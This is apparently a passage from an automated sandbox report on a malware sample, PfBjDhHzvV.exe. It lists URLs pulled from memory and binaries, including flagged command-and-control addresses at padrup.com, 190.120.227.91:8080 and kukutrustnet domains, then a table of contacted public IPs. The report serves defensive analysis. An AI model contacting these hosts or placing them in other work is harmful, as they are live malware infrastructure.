                              		unknown
                              http://padrup.com/sobaka1.gif?7a93601=771179526true
                                		unknown
                                http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656true
                                  		unknown
                                  http://190.120.227.91:8080/sobakavolos.gif?588b379=464224605true
                                    		unknown
                                    http://190.120.227.91:8080/sobakavolos.gif?15f8580=23037312true
                                      		unknown
                                      http://padrup.com/sobaka1.gif?29e644c=439347960true
                                        		unknown
                                        http://190.120.227.91:8080/sobakavolos.gif?90f197=37996124true
                                          		unknown
                                          http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763true
                                            		unknown
                                            http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436true
                                              		unknown
                                              http://padrup.com/sobaka1.gif?3f9f77c=600421212true
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000A.00000002.2800092520.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.msn.com/spartan/ntpISearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://osoft.co_2010-06Xdwm.exe, 00000005.00000000.1392615637.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.3004388837.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://aefd.nelreports.net/api/report?cat=bingaotakSearchApp.exe, 0000000F.00000000.1560312039.000001F49B244000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://padrup.com/sobaka1.gif?617d87e=1022260460)PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375-&PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120(PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PurchasepWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://wns.windows.com/explorer.exe, 0000000A.00000000.1450832815.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.datacontract.org/2004/07/Store.Purchase.Component.WebApi.ClientConditionsProcessorWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062;PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000A.00000003.2275648262.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1455294750.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275779862.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2283066349.000000000C450000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4wSearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://padrup.com/sobaka1.gif?7a93601=771179526bPfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://kukutrustnet987.info/home.gifPfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://ns.adobe.hoL2StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRightSearchApp.exe, 0000000F.00000000.1608010494.000001F4AEA67000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://ns.adoraStartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ntp.msn.com/web-widget?form=MSearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://padrup.com/sobaka1.gif?7a93601=771179526qPfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090~PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://accounts.xboxlive.com/codeOfConduct/WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://loki.delve.office.com/api33366b5b-54ef-48bf-819d-677748eae9e33B199897-A63E-44DC-BF20-DF6F6F2SearchApp.exe, 0000000F.00000000.1561497256.000001F49B460000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://padrup.com/sobaka1.gif?f24e375=-2008285411yPfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://xsts.auth.xboxlive.comeySearchApp.exe, 0000000F.00000000.1562812972.000001F49B644000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://190.120.227.91:8080/sobakavolos.gif?10aef23e=19593051388PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://padrup.com/sobaka1.gif?52dc95=21721684~PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://schemas.datacontract.org/2004/07/Windows.Web.HttpWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://login.windows.localicysvchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544714307.000001EC94D13000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://substrate.office.com/SubstrateSearch-Internal.ReadWrite_iframe.contentWindow.BingAtWork.workSearchApp.exe, 0000000F.00000000.1562380324.000001F49B5D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://substrate.office.com/search/api/v2/queryhttps://substrate.office365.us/search/api/v2/querySearchApp.exe, 0000000F.00000000.1562196902.000001F49B590000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstrumentsWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://xsts.auth.xboxlive.com/svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://windows.msn.com/shellSearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://schemas.datacontract.org/2004/07/Store.PurchasepWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://outlook.office.com/ZSearchApp.exe, 0000000F.00000000.1599317840.000001F4AE700000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://live.xbox.com/purchase/xbox/WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://excel.office.compStartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://xsts.auth.xboxlive.comsvchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://powerpoint.office.comcemberxStartMenuExperienceHost.exe, 0000000D.00000000.1499131744.000001A4423E6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://outlook.office.com/User.ReadWritejSearchApp.exe, 0000000F.00000000.1599565472.000001F4AE720000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://login.windows.localhttps://login.windows.local/WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.microexplorer.exe, 0000000A.00000002.2928181034.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1448330097.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1449558403.0000000008820000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000E.00000000.1529627936.00000269817E0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1706581163.0000018570620000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/cortanaSearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://outlook.office.com/SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://kukutrustnet777888.info/DisableTaskMgrSoftwarePfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.apache.org/PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.msn.com/spartan/mmxhSearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.CatalogpWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://substrate.office.com/M365.AccessSearchApp.exe, 0000000F.00000000.1617033060.000001F4AEC86000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.ng.comSearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://outlook.office.com/User.ReadWriteSearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchApp.exe, 0000000F.00000000.1587591500.000001F4AE17E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://graph.windows.net/SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.CatalogWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.msn.com/de-ch/play/games/basketball-frvr/cg-9npd4c9369l0SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://unitedstates4.ss.wd.microsoft.ussmartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://gcchigh.loki.office365.us/api/v1/configuration/cortanaSearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.ProfilepWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://unitedstates2.ss.wd.microsoft.ussmartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://unitedstates1.ss.wd.microsoft.ussmartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://190.120.227.91:8080/sobakavolos.gif?53c2ee=32936340FPfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://padrup.com/sobaka1.gif?3467cb5=274755465#PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://schemas.datacontract.org/2004/07/Store.Purchase.DataModelpWinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://substrate.office.com/M365.Accesshttps://outlook.office.com/User.ReadWriteSearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA3E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://190.120.227.91:8080/sobakavolos.gif?7ca48dd=6534871858PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000F.00000000.1547534482.000001EC9A36A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1545849761.000001EC9969A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        77.81.228.77
                                                                                                                                                                                                        		unknownItaly
                                                                                                                                                                                                        		31034ARUBA-ASNITfalse
                                                                                                                                                                                                        190.120.227.91
                                                                                                                                                                                                        		unknownunknown
                                                                                                                                                                                                        		270821SARAONLINEINFORMATICAEIRELI-MEBRtrue
                                                                                                                                                                                                        115.119.58.98
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		4755TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISPfalse
                                                                                                                                                                                                        189.35.177.247
                                                                                                                                                                                                        		unknownBrazil
                                                                                                                                                                                                        		28573CLAROSABRfalse
                                                                                                                                                                                                        94.55.239.88
                                                                                                                                                                                                        		unknownTurkey
                                                                                                                                                                                                        		47524TURKSAT-ASTRfalse
                                                                                                                                                                                                        81.180.90.149
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		47427DTNETWOKROfalse
                                                                                                                                                                                                        124.123.112.184
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                                                                                                                                                                                        195.42.129.188
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		44605TELECABLU-ASNROfalse
                                                                                                                                                                                                        185.53.178.50
                                                                                                                                                                                                        		padrup.comGermany
                                                                                                                                                                                                        		61969TEAMINTERNET-ASDEtrue
                                                                                                                                                                                                        195.174.68.81
                                                                                                                                                                                                        		unknownTurkey
                                                                                                                                                                                                        		9121TTNETTRfalse
                                                                                                                                                                                                        46.248.223.58
                                                                                                                                                                                                        		unknownJordan
                                                                                                                                                                                                        		9038BAT-AS9038JOfalse
                                                                                                                                                                                                        121.162.97.129
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                        189.25.42.209
                                                                                                                                                                                                        		unknownBrazil
                                                                                                                                                                                                        		7738TelemarNorteLesteSABRtrue
                                                                                                                                                                                                        183.83.119.156
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		24309CABLELITE-AS-APAtriaConvergenceTechnologiesPvtLtdBrofalse
                                                                                                                                                                                                        95.64.101.42
                                                                                                                                                                                                        		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                        		197207MCCI-ASIRfalse
                                                                                                                                                                                                        46.45.148.196
                                                                                                                                                                                                        		unknownTurkey
                                                                                                                                                                                                        		42926RADORETRfalse
                                                                                                                                                                                                        113.190.137.239
                                                                                                                                                                                                        		unknownViet Nam
                                                                                                                                                                                                        		45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                                                                                                                        83.222.184.130
                                                                                                                                                                                                        		unknownBulgaria
                                                                                                                                                                                                        		43561NET1-ASBGfalse
                                                                                                                                                                                                        94.76.206.19
                                                                                                                                                                                                        		unknownUnited Kingdom
                                                                                                                                                                                                        		29550SIMPLYTRANSITGBfalse
                                                                                                                                                                                                        77.81.228.140
                                                                                                                                                                                                        		unknownItaly
                                                                                                                                                                                                        		31034ARUBA-ASNITfalse
                                                                                                                                                                                                        195.46.33.124
                                                                                                                                                                                                        		unknownUkraine
                                                                                                                                                                                                        		196953ASMALTAPLUSUAfalse
                                                                                                                                                                                                        89.45.96.223
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		6910DIALTELECOMROfalse
                                                                                                                                                                                                        81.199.91.188
                                                                                                                                                                                                        		unknownUnited Kingdom
                                                                                                                                                                                                        		12491IPPLANET-ASILfalse
                                                                                                                                                                                                        178.233.92.89
                                                                                                                                                                                                        		unknownTurkey
                                                                                                                                                                                                        		47524TURKSAT-ASTRfalse
                                                                                                                                                                                                        195.239.22.166
                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                        		3216SOVAM-ASRUfalse
                                                                                                                                                                                                        77.81.225.89
                                                                                                                                                                                                        		unknownItaly
                                                                                                                                                                                                        		31034ARUBA-ASNITfalse
                                                                                                                                                                                                        115.98.98.230
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                                                                                                                                                                                                        121.135.15.57
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                        89.45.97.101
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		6910DIALTELECOMROfalse
                                                                                                                                                                                                        190.111.22.45
                                                                                                                                                                                                        		unknownGuatemala
                                                                                                                                                                                                        		26617NavegacomSAGTfalse
                                                                                                                                                                                                        203.110.84.90
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		23872DELDSLCORE-AS-APdelDSLInternetPvtLtdINfalse
                                                                                                                                                                                                        80.178.242.19
                                                                                                                                                                                                        		unknownIsrael
                                                                                                                                                                                                        		9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
                                                                                                                                                                                                        95.76.49.203
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                                                                                                                                                                        183.83.90.202
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                                                                                                                                                                                        117.239.49.110
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                                                                                                                        195.174.143.33
                                                                                                                                                                                                        		unknownTurkey
                                                                                                                                                                                                        		9121TTNETTRfalse
                                                                                                                                                                                                        58.85.93.82
                                                                                                                                                                                                        		unknownJapan9617ZAQJupiterTelecommunicationsCoLtdJPfalse
                                                                                                                                                                                                        122.99.102.253
                                                                                                                                                                                                        		unknownBangladesh
                                                                                                                                                                                                        		17471CYBERNET-BD-ASGrameenCybernetLtdBangladeshASforlocafalse
                                                                                                                                                                                                        188.215.26.241
                                                                                                                                                                                                        		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                        		57218RIGHTELIRfalse
                                                                                                                                                                                                        124.30.139.5
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		9583SIFY-AS-INSifyLimitedINfalse
                                                                                                                                                                                                        196.201.129.61
                                                                                                                                                                                                        		unknownKenya
                                                                                                                                                                                                        		5713SAIX-NETZAfalse
                                                                                                                                                                                                        85.204.112.3
                                                                                                                                                                                                        		unknownItaly
                                                                                                                                                                                                        		197589ALFANEWSITfalse
                                                                                                                                                                                                        121.243.130.85
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		17908TCISLTataCommunicationsINfalse
                                                                                                                                                                                                        77.81.224.130
                                                                                                                                                                                                        		unknownItaly
                                                                                                                                                                                                        		31034ARUBA-ASNITfalse
                                                                                                                                                                                                        93.114.177.116
                                                                                                                                                                                                        		unknownRomania
